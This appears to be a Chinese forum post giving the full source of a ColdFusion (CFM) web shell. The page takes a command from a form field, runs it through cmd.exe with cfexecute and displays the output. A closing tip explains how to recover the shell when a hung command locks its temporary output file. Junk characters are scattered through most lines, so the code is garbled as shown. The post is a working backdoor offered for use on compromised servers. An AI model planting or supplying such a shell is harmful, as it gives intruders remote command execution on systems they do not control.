cfm的cmdshell使用注意

admin

cfm-cmdshell
; [; e1 M$ E: n5 u8 K<html>   
9 L8 ~4 X# z# @0 t5 @; H<head>   
: a$ D: k+ j1 C0 D& L5 k<meta http-equiv="Content-Type" content="text/html; charset=gb2312">   
# Q  w; E! J8 J. `& |7 o' @; S<title>CFM shell</title>   
- e' E! G! S' {6 {% x* e</head>   
8 i9 @# _2 i5 m<body>   
0 O! x' ?( d6 I/ ]. r2 T$ J<!--- os.run --->   
* i8 |# K- L2 m. j# g; L+ P<cfif IsDefined("FORM.cmd")>   
    <cfoutput>#cmd#</cfoutput>   
    <cfexecute name="C:\Winnt\System32\cmd.exe"   
           arguments="/c #cmd#"   
7 J( y* f) z& |           outputfile="#GetTempDirectory()#foobar.txt"   
           timeout="1">   
$ [2 r5 R0 e9 r4 V5 y1 t! U, U# h    </cfexecute>   
</cfif>   
5 R. J% d! R/ x" F% E$ O7 h<form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">   
  z! ?& K" L) d* [: L3 ]<input type=text size=45 name="cmd" >   
<input type=Submit value="run">   
</form>   
<cfif FileExists("#GetTempDirectory()#foobar.txt") is "Yes">   
7 y/ Z- b6 P1 h/ [  <cffile action="Read"   
8 m0 a4 {: Y* U" m4 i' p            file="#GetTempDirectory()#foobar.txt"   
6 r  H3 V7 |) O0 A: O0 @0 q            variable="readText">   
- }5 y# I* O6 ~) V1 L/ H<textarea readonly cols=80 rows=20>   
<CFOUTPUT>#readText#</CFOUTPUT>            
</textarea>   
    <cffile action="Delete"   
            file="#GetTempDirectory()#foobar.txt">   
</cfif>   
" a* @9 Q( d0 X3 i% x) r& d4 C</body>   
. e. |0 @% V! y8 {3 D</html>   
/ K2 A5 M: |$ Q& A3 L3 N. b6 Y& e
( f3 Z8 [4 r8 n有时候会发现执行某次cmd后没有正常结束，造成后面不能执行命令。这时候只要修改下shell的foobar.txt名字，几处都改一下就可以了。想来是程序未正常退出，文件被占用，写不进去了。
/ W- G) e9 S- N3 x  `* z+ r